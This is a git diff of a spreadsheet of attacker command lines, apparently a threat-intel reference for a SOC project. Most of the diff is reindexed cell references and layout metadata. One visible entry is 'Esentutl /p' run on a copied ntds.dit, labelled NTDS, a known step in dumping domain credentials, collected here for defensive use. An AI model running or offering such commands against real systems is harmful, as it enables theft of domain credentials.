     <row r="221" spans="1:6" ht="17">
       <c r="A221" t="s">
-        <v>40</v>
+        <v>282</v>
       </c>
       <c r="B221" s="1" t="s">
-        <v>92</v>
-      </c>
-      <c r="C221" s="1" t="s">
-        <v>93</v>
-      </c>
+        <v>220</v>
+      </c>
+      <c r="C221" s="1"/>
       <c r="E221" t="s">
-        <v>6</v>
+        <v>225</v>
       </c>
       <c r="F221" t="s">
-        <v>88</v>
-      </c>
-    </row>
-    <row r="222" spans="1:6" ht="17">
+        <v>224</v>
+      </c>
+    </row>
+    <row r="222" spans="1:6" ht="323">
       <c r="A222" t="s">
-        <v>40</v>
+        <v>282</v>
       </c>
       <c r="B222" s="1" t="s">
-        <v>117</v>
-      </c>
-      <c r="C222" s="1" t="s">
-        <v>121</v>
-      </c>
+        <v>325</v>
+      </c>
+      <c r="C222" s="1"/>
       <c r="E222" t="s">
-        <v>6</v>
+        <v>308</v>
       </c>
       <c r="F222" t="s">
-        <v>88</v>
-      </c>
-    </row>
-    <row r="223" spans="1:6" ht="17">
+        <v>320</v>
+      </c>
+    </row>
+    <row r="223" spans="1:6" ht="68">
       <c r="A223" t="s">
-        <v>40</v>
+        <v>281</v>
       </c>
       <c r="B223" s="1" t="s">
-        <v>118</v>
-      </c>
-      <c r="C223" s="1" t="s">
-        <v>121</v>
-      </c>
+        <v>279</v>
+      </c>
+      <c r="C223" s="1"/>
       <c r="E223" t="s">
-        <v>6</v>
+        <v>235</v>
       </c>
       <c r="F223" t="s">
-        <v>88</v>
-      </c>
-    </row>
-    <row r="224" spans="1:6" ht="17">
+        <v>285</v>
+      </c>
+    </row>
+    <row r="224" spans="1:6" ht="68">
       <c r="A224" t="s">
-        <v>40</v>
+        <v>281</v>
       </c>
       <c r="B224" s="1" t="s">
-        <v>119</v>
-      </c>
-      <c r="C224" s="1" t="s">
-        <v>121</v>
-      </c>
+        <v>280</v>
+      </c>
+      <c r="C224" s="1"/>
       <c r="E224" t="s">
-        <v>6</v>
+        <v>235</v>
       </c>
       <c r="F224" t="s">
-        <v>88</v>
-      </c>
-    </row>
-    <row r="225" spans="1:6" ht="17">
+        <v>285</v>
+      </c>
+    </row>
+    <row r="225" spans="1:6" ht="51">
       <c r="A225" t="s">
-        <v>40</v>
+        <v>110</v>
       </c>
       <c r="B225" s="1" t="s">
-        <v>120</v>
-      </c>
-      <c r="C225" s="1" t="s">
-        <v>121</v>
-      </c>
+        <v>108</v>
+      </c>
+      <c r="C225" s="1"/>
       <c r="E225" t="s">
         <v>6</v>
       </c>
@@ -5408,10 +5385,10 @@
     </row>
     <row r="226" spans="1:6" ht="17">
       <c r="A226" t="s">
-        <v>40</v>
+        <v>110</v>
       </c>
       <c r="B226" s="1" t="s">
-        <v>136</v>
+        <v>109</v>
       </c>
       <c r="C226" s="1"/>
       <c r="E226" t="s">
@@ -5423,13 +5400,13 @@
     </row>
     <row r="227" spans="1:6" ht="17">
       <c r="A227" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B227" s="1" t="s">
-        <v>8</v>
+        <v>14</v>
       </c>
       <c r="C227" s="1" t="s">
-        <v>35</v>
+        <v>31</v>
       </c>
       <c r="E227" t="s">
         <v>6</v>
@@ -5440,30 +5417,30 @@
     </row>
     <row r="228" spans="1:6" ht="17">
       <c r="A228" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B228" s="1" t="s">
-        <v>15</v>
+        <v>30</v>
       </c>
       <c r="C228" s="1" t="s">
-        <v>33</v>
+        <v>31</v>
       </c>
       <c r="E228" t="s">
         <v>6</v>
       </c>
       <c r="F228" t="s">
-        <v>7</v>
+        <v>28</v>
       </c>
     </row>
     <row r="229" spans="1:6" ht="17">
       <c r="A229" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B229" s="1" t="s">
-        <v>32</v>
+        <v>51</v>
       </c>
       <c r="C229" s="1" t="s">
-        <v>33</v>
+        <v>52</v>
       </c>
       <c r="E229" t="s">
         <v>6</v>
@@ -5474,13 +5451,13 @@
     </row>
     <row r="230" spans="1:6" ht="17">
       <c r="A230" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B230" s="1" t="s">
-        <v>34</v>
+        <v>53</v>
       </c>
       <c r="C230" s="1" t="s">
-        <v>35</v>
+        <v>52</v>
       </c>
       <c r="E230" t="s">
         <v>6</v>
@@ -5491,10 +5468,10 @@
     </row>
     <row r="231" spans="1:6" ht="17">
       <c r="A231" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B231" s="1" t="s">
-        <v>71</v>
+        <v>75</v>
       </c>
       <c r="C231" s="1"/>
       <c r="E231" t="s">
@@ -5506,10 +5483,10 @@
     </row>
     <row r="232" spans="1:6" ht="17">
       <c r="A232" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B232" s="1" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
       <c r="C232" s="1"/>
       <c r="E232" t="s">
@@ -5521,100 +5498,102 @@
     </row>
     <row r="233" spans="1:6" ht="17">
       <c r="A233" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>306</v>
+        <v>240</v>
       </c>
       <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F233" t="s">
-        <v>307</v>
-      </c>
-    </row>
-    <row r="234" spans="1:6" ht="34">
+        <v>234</v>
+      </c>
+    </row>
+    <row r="234" spans="1:6" ht="17">
       <c r="A234" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>335</v>
+        <v>241</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F234" t="s">
-        <v>327</v>
-      </c>
-    </row>
-    <row r="235" spans="1:6" ht="17">
+        <v>234</v>
+      </c>
+    </row>
+    <row r="235" spans="1:6" ht="34">
       <c r="A235" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>336</v>
-      </c>
-      <c r="C235" s="1"/>
+        <v>263</v>
+      </c>
+      <c r="C235" s="1" t="s">
+        <v>264</v>
+      </c>
       <c r="E235" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F235" t="s">
-        <v>337</v>
+        <v>234</v>
       </c>
     </row>
     <row r="236" spans="1:6" ht="17">
       <c r="A236" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>339</v>
+        <v>283</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F236" t="s">
-        <v>337</v>
+        <v>285</v>
       </c>
     </row>
     <row r="237" spans="1:6" ht="17">
       <c r="A237" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>341</v>
+        <v>284</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F237" t="s">
-        <v>337</v>
-      </c>
-    </row>
-    <row r="238" spans="1:6" ht="34">
+        <v>285</v>
+      </c>
+    </row>
+    <row r="238" spans="1:6" ht="204">
       <c r="A238" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>351</v>
+        <v>291</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>308</v>
+        <v>235</v>
       </c>
       <c r="F238" t="s">
-        <v>345</v>
+        <v>290</v>
       </c>
     </row>
     <row r="239" spans="1:6" ht="17">
       <c r="A239" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B239" s="1" t="s">
-        <v>383</v>
+        <v>384</v>
       </c>
       <c r="C239" s="1"/>
       <c r="E239" t="s">
@@ -5624,20 +5603,391 @@
         <v>381</v>
       </c>
     </row>
-    <row r="240" spans="1:6" ht="51">
+    <row r="240" spans="1:6" ht="17">
       <c r="A240" t="s">
+        <v>40</v>
+      </c>
+      <c r="B240" s="1" t="s">
+        <v>19</v>
+      </c>
+      <c r="C240" s="1" t="s">
+        <v>41</v>
+      </c>
+      <c r="E240" t="s">
+        <v>6</v>
+      </c>
+      <c r="F240" t="s">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="241" spans="1:6" ht="17">
+      <c r="A241" t="s">
+        <v>40</v>
+      </c>
+      <c r="B241" s="1" t="s">
+        <v>39</v>
+      </c>
+      <c r="C241" s="1" t="s">
+        <v>41</v>
+      </c>
+      <c r="E241" t="s">
+        <v>6</v>
+      </c>
+      <c r="F241" t="s">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="242" spans="1:6" ht="34">
+      <c r="A242" t="s">
+        <v>40</v>
+      </c>
+      <c r="B242" s="1" t="s">
+        <v>54</v>
+      </c>
+      <c r="C242" s="1" t="s">
+        <v>55</v>
+      </c>
+      <c r="E242" t="s">
+        <v>6</v>
+      </c>
+      <c r="F242" t="s">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="243" spans="1:6" ht="17">
+      <c r="A243" t="s">
+        <v>40</v>
+      </c>
+      <c r="B243" s="1" t="s">
+        <v>79</v>
+      </c>
+      <c r="C243" s="1" t="s">
+        <v>55</v>
+      </c>
+      <c r="E243" t="s">
+        <v>6</v>
+      </c>
+      <c r="F243" t="s">
+        <v>70</v>
+      </c>
+    </row>
+    <row r="244" spans="1:6" ht="17">
+      <c r="A244" t="s">
+        <v>40</v>
+      </c>
+      <c r="B244" s="1" t="s">
+        <v>92</v>
+      </c>
+      <c r="C244" s="1" t="s">
+        <v>93</v>
+      </c>
+      <c r="E244" t="s">
+        <v>6</v>
+      </c>
+      <c r="F244" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="245" spans="1:6" ht="17">
+      <c r="A245" t="s">
+        <v>40</v>
+      </c>
+      <c r="B245" s="1" t="s">
+        <v>117</v>
+      </c>
+      <c r="C245" s="1" t="s">
+        <v>121</v>
+      </c>
+      <c r="E245" t="s">
+        <v>6</v>
+      </c>
+      <c r="F245" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="246" spans="1:6" ht="17">
+      <c r="A246" t="s">
+        <v>40</v>
+      </c>
+      <c r="B246" s="1" t="s">
+        <v>118</v>
+      </c>
+      <c r="C246" s="1" t="s">
+        <v>121</v>
+      </c>
+      <c r="E246" t="s">
+        <v>6</v>
+      </c>
+      <c r="F246" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="247" spans="1:6" ht="17">
+      <c r="A247" t="s">
+        <v>40</v>
+      </c>
+      <c r="B247" s="1" t="s">
+        <v>119</v>
+      </c>
+      <c r="C247" s="1" t="s">
+        <v>121</v>
+      </c>
+      <c r="E247" t="s">
+        <v>6</v>
+      </c>
+      <c r="F247" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="248" spans="1:6" ht="17">
+      <c r="A248" t="s">
+        <v>40</v>
+      </c>
+      <c r="B248" s="1" t="s">
+        <v>120</v>
+      </c>
+      <c r="C248" s="1" t="s">
+        <v>121</v>
+      </c>
+      <c r="E248" t="s">
+        <v>6</v>
+      </c>
+      <c r="F248" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="249" spans="1:6" ht="17">
+      <c r="A249" t="s">
+        <v>40</v>
+      </c>
+      <c r="B249" s="1" t="s">
+        <v>136</v>
+      </c>
+      <c r="C249" s="1"/>
+      <c r="E249" t="s">
+        <v>6</v>
+      </c>
+      <c r="F249" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="250" spans="1:6" ht="17">
+      <c r="A250" t="s">
+        <v>11</v>
+      </c>
+      <c r="B250" s="1" t="s">
+        <v>8</v>
+      </c>
+      <c r="C250" s="1" t="s">
+        <v>35</v>
+      </c>
+      <c r="E250" t="s">
+        <v>6</v>
+      </c>
+      <c r="F250" t="s">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="251" spans="1:6" ht="17">
+      <c r="A251" t="s">
+        <v>11</v>
+      </c>
+      <c r="B251" s="1" t="s">
+        <v>15</v>
+      </c>
+      <c r="C251" s="1" t="s">
+        <v>33</v>
+      </c>
+      <c r="E251" t="s">
+        <v>6</v>
+      </c>
+      <c r="F251" t="s">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="252" spans="1:6" ht="17">
+      <c r="A252" t="s">
+        <v>11</v>
+      </c>
+      <c r="B252" s="1" t="s">
+        <v>32</v>
+      </c>
+      <c r="C252" s="1" t="s">
+        <v>33</v>
+      </c>
+      <c r="E252" t="s">
+        <v>6</v>
+      </c>
+      <c r="F252" t="s">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="253" spans="1:6" ht="17">
+      <c r="A253" t="s">
+        <v>11</v>
+      </c>
+      <c r="B253" s="1" t="s">
+        <v>34</v>
+      </c>
+      <c r="C253" s="1" t="s">
+        <v>35</v>
+      </c>
+      <c r="E253" t="s">
+        <v>6</v>
+      </c>
+      <c r="F253" t="s">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="254" spans="1:6" ht="17">
+      <c r="A254" t="s">
+        <v>11</v>
+      </c>
+      <c r="B254" s="1" t="s">
+        <v>71</v>
+      </c>
+      <c r="C254" s="1"/>
+      <c r="E254" t="s">
+        <v>6</v>
+      </c>
+      <c r="F254" t="s">
+        <v>70</v>
+      </c>
+    </row>
+    <row r="255" spans="1:6" ht="17">
+      <c r="A255" t="s">
+        <v>11</v>
+      </c>
+      <c r="B255" s="1" t="s">
+        <v>133</v>
+      </c>
+      <c r="C255" s="1"/>
+      <c r="E255" t="s">
+        <v>6</v>
+      </c>
+      <c r="F255" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="256" spans="1:6" ht="17">
+      <c r="A256" t="s">
+        <v>11</v>
+      </c>
+      <c r="B256" s="1" t="s">
+        <v>306</v>
+      </c>
+      <c r="C256" s="1"/>
+      <c r="E256" t="s">
+        <v>308</v>
+      </c>
+      <c r="F256" t="s">
+        <v>307</v>
+      </c>
+    </row>
+    <row r="257" spans="1:6" ht="34">
+      <c r="A257" t="s">
+        <v>11</v>
+      </c>
+      <c r="B257" s="1" t="s">
+        <v>335</v>
+      </c>
+      <c r="C257" s="1"/>
+      <c r="E257" t="s">
+        <v>308</v>
+      </c>
+      <c r="F257" t="s">
+        <v>327</v>
+      </c>
+    </row>
+    <row r="258" spans="1:6" ht="17">
+      <c r="A258" t="s">
+        <v>11</v>
+      </c>
+      <c r="B258" s="1" t="s">
+        <v>336</v>
+      </c>
+      <c r="C258" s="1"/>
+      <c r="E258" t="s">
+        <v>308</v>
+      </c>
+      <c r="F258" t="s">
+        <v>337</v>
+      </c>
+    </row>
+    <row r="259" spans="1:6" ht="17">
+      <c r="A259" t="s">
+        <v>11</v>
+      </c>
+      <c r="B259" s="1" t="s">
+        <v>339</v>
+      </c>
+      <c r="C259" s="1"/>
+      <c r="E259" t="s">
+        <v>308</v>
+      </c>
+      <c r="F259" t="s">
+        <v>337</v>
+      </c>
+    </row>
+    <row r="260" spans="1:6" ht="17">
+      <c r="A260" t="s">
+        <v>11</v>
+      </c>
+      <c r="B260" s="1" t="s">
+        <v>341</v>
+      </c>
+      <c r="C260" s="1"/>
+      <c r="E260" t="s">
+        <v>308</v>
+      </c>
+      <c r="F260" t="s">
+        <v>337</v>
+      </c>
+    </row>
+    <row r="261" spans="1:6" ht="34">
+      <c r="A261" t="s">
+        <v>11</v>
+      </c>
+      <c r="B261" s="1" t="s">
+        <v>351</v>
+      </c>
+      <c r="C261" s="1"/>
+      <c r="E261" t="s">
+        <v>308</v>
+      </c>
+      <c r="F261" t="s">
+        <v>345</v>
+      </c>
+    </row>
+    <row r="262" spans="1:6" ht="17">
+      <c r="A262" t="s">
+        <v>11</v>
+      </c>
+      <c r="B262" s="1" t="s">
+        <v>383</v>
+      </c>
+      <c r="C262" s="1"/>
+      <c r="E262" t="s">
+        <v>380</v>
+      </c>
+      <c r="F262" t="s">
+        <v>381</v>
+      </c>
+    </row>
+    <row r="263" spans="1:6" ht="51">
+      <c r="A263" t="s">
         <v>276</v>
       </c>
-      <c r="B240" s="1" t="s">
+      <c r="B263" s="1" t="s">
         <v>275</v>
       </c>
-      <c r="C240" s="1" t="s">
+      <c r="C263" s="1" t="s">
         <v>277</v>
       </c>
-      <c r="E240" t="s">
+      <c r="E263" t="s">
         <v>235</v>
       </c>
-      <c r="F240" t="s">
+      <c r="F263" t="s">
         <v>273</v>
       </c>
     </row>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{25A943D0-2DC7-BE41-AE9E-3D82CFB153F7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{DC937C1A-0881-DB4B-864E-232D31C79453}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1894,16 +1894,17 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="B10" sqref="B10"/>
+    <sheetView tabSelected="1" topLeftCell="A73" workbookViewId="0">
+      <selection activeCell="B12" sqref="B12"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
-    <col min="1" max="1" width="13.33203125" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="120" customWidth="1"/>
-    <col min="3" max="3" width="90.5" customWidth="1"/>
-    <col min="4" max="5" width="18.1640625" customWidth="1"/>
+    <col min="1" max="1" width="22.83203125" customWidth="1"/>
+    <col min="2" max="2" width="127.83203125" customWidth="1"/>
+    <col min="3" max="3" width="95.83203125" customWidth="1"/>
+    <col min="4" max="4" width="13.1640625" customWidth="1"/>
+    <col min="5" max="5" width="18.1640625" customWidth="1"/>
     <col min="6" max="6" width="116.33203125" bestFit="1" customWidth="1"/>
     <col min="7" max="7" width="148.1640625" customWidth="1"/>
   </cols>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10114"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10211"/>
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{DC937C1A-0881-DB4B-864E-232D31C79453}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A2B5272F-2DB2-E64B-8986-BD187A5BB65B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1192,9 +1192,6 @@
     <t>Esentutl /p C:\log\ntds.dit</t>
   </si>
   <si>
-    <t>NDTS</t>
-  </si>
-  <si>
     <t>ESENTUTL</t>
   </si>
   <si>
@@ -1469,6 +1466,9 @@
   </si>
   <si>
     <t>https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e</t>
+  </si>
+  <si>
+    <t>NTDS</t>
   </si>
 </sst>
 </file>
@@ -1543,7 +1543,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="7">
+  <cellXfs count="5">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
@@ -1551,8 +1551,6 @@
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
     <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1894,8 +1892,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A73" workbookViewId="0">
-      <selection activeCell="B12" sqref="B12"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="B140" sqref="B140"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -2069,14 +2067,14 @@
         <v>309</v>
       </c>
       <c r="B11" s="1" t="s">
-        <v>374</v>
+        <v>373</v>
       </c>
       <c r="C11" s="1"/>
       <c r="E11" t="s">
-        <v>376</v>
+        <v>375</v>
       </c>
       <c r="F11" t="s">
-        <v>375</v>
+        <v>374</v>
       </c>
     </row>
     <row r="12" spans="1:6" ht="34">
@@ -2308,14 +2306,14 @@
         <v>17</v>
       </c>
       <c r="B26" s="1" t="s">
-        <v>382</v>
+        <v>381</v>
       </c>
       <c r="C26" s="1"/>
       <c r="E26" t="s">
+        <v>379</v>
+      </c>
+      <c r="F26" t="s">
         <v>380</v>
-      </c>
-      <c r="F26" t="s">
-        <v>381</v>
       </c>
     </row>
     <row r="27" spans="1:6" ht="17">
@@ -2408,7 +2406,7 @@
         <v>101</v>
       </c>
       <c r="B32" s="1" t="s">
-        <v>356</v>
+        <v>355</v>
       </c>
       <c r="C32" s="1"/>
       <c r="E32" t="s">
@@ -2418,12 +2416,12 @@
         <v>345</v>
       </c>
     </row>
-    <row r="33" spans="1:6" ht="34">
+    <row r="33" spans="1:6" ht="17">
       <c r="A33" t="s">
         <v>101</v>
       </c>
       <c r="B33" s="1" t="s">
-        <v>357</v>
+        <v>356</v>
       </c>
       <c r="C33" s="1"/>
       <c r="E33" t="s">
@@ -2433,16 +2431,16 @@
         <v>345</v>
       </c>
     </row>
-    <row r="34" spans="1:6" ht="34">
+    <row r="34" spans="1:6" ht="17">
       <c r="A34" t="s">
         <v>101</v>
       </c>
       <c r="B34" s="1" t="s">
-        <v>432</v>
+        <v>431</v>
       </c>
       <c r="C34" s="1"/>
       <c r="F34" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="35" spans="1:6" ht="17">
@@ -2450,11 +2448,11 @@
         <v>101</v>
       </c>
       <c r="B35" s="1" t="s">
-        <v>433</v>
+        <v>432</v>
       </c>
       <c r="C35" s="1"/>
       <c r="F35" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="36" spans="1:6" ht="34">
@@ -2462,11 +2460,11 @@
         <v>101</v>
       </c>
       <c r="B36" s="1" t="s">
-        <v>417</v>
+        <v>416</v>
       </c>
       <c r="C36" s="1"/>
       <c r="F36" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="37" spans="1:6" ht="34">
@@ -2474,11 +2472,11 @@
         <v>101</v>
       </c>
       <c r="B37" s="1" t="s">
-        <v>418</v>
+        <v>417</v>
       </c>
       <c r="C37" s="1"/>
       <c r="F37" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="38" spans="1:6" ht="34">
@@ -2486,11 +2484,11 @@
         <v>101</v>
       </c>
       <c r="B38" s="1" t="s">
-        <v>434</v>
+        <v>433</v>
       </c>
       <c r="C38" s="1"/>
       <c r="F38" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="39" spans="1:6" ht="34">
@@ -2498,23 +2496,23 @@
         <v>101</v>
       </c>
       <c r="B39" s="1" t="s">
-        <v>419</v>
+        <v>418</v>
       </c>
       <c r="C39" s="1"/>
       <c r="F39" t="s">
-        <v>440</v>
-      </c>
-    </row>
-    <row r="40" spans="1:6" ht="51">
+        <v>439</v>
+      </c>
+    </row>
+    <row r="40" spans="1:6" ht="34">
       <c r="A40" t="s">
         <v>101</v>
       </c>
       <c r="B40" s="1" t="s">
-        <v>420</v>
+        <v>419</v>
       </c>
       <c r="C40" s="1"/>
       <c r="F40" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="41" spans="1:6" ht="51">
@@ -2522,11 +2520,11 @@
         <v>101</v>
       </c>
       <c r="B41" s="1" t="s">
-        <v>421</v>
+        <v>420</v>
       </c>
       <c r="C41" s="1"/>
       <c r="F41" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="42" spans="1:6" ht="34">
@@ -2534,11 +2532,11 @@
         <v>101</v>
       </c>
       <c r="B42" s="1" t="s">
-        <v>422</v>
+        <v>421</v>
       </c>
       <c r="C42" s="1"/>
       <c r="F42" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="43" spans="1:6" ht="51">
@@ -2546,11 +2544,11 @@
         <v>101</v>
       </c>
       <c r="B43" s="1" t="s">
-        <v>423</v>
+        <v>422</v>
       </c>
       <c r="C43" s="1"/>
       <c r="F43" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="44" spans="1:6" ht="17">
@@ -2558,23 +2556,23 @@
         <v>101</v>
       </c>
       <c r="B44" s="1" t="s">
-        <v>424</v>
+        <v>423</v>
       </c>
       <c r="C44" s="1"/>
       <c r="F44" t="s">
-        <v>440</v>
-      </c>
-    </row>
-    <row r="45" spans="1:6" ht="51">
+        <v>439</v>
+      </c>
+    </row>
+    <row r="45" spans="1:6" ht="34">
       <c r="A45" t="s">
         <v>101</v>
       </c>
       <c r="B45" s="1" t="s">
-        <v>435</v>
+        <v>434</v>
       </c>
       <c r="C45" s="1"/>
       <c r="F45" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
     </row>
     <row r="46" spans="1:6" ht="34">
@@ -2582,35 +2580,35 @@
         <v>101</v>
       </c>
       <c r="B46" s="1" t="s">
-        <v>425</v>
+        <v>424</v>
       </c>
       <c r="C46" s="1"/>
       <c r="F46" t="s">
-        <v>440</v>
-      </c>
-    </row>
-    <row r="47" spans="1:6" ht="51">
+        <v>439</v>
+      </c>
+    </row>
+    <row r="47" spans="1:6" ht="34">
       <c r="A47" t="s">
         <v>101</v>
       </c>
       <c r="B47" s="1" t="s">
-        <v>426</v>
+        <v>425</v>
       </c>
       <c r="C47" s="1"/>
       <c r="F47" t="s">
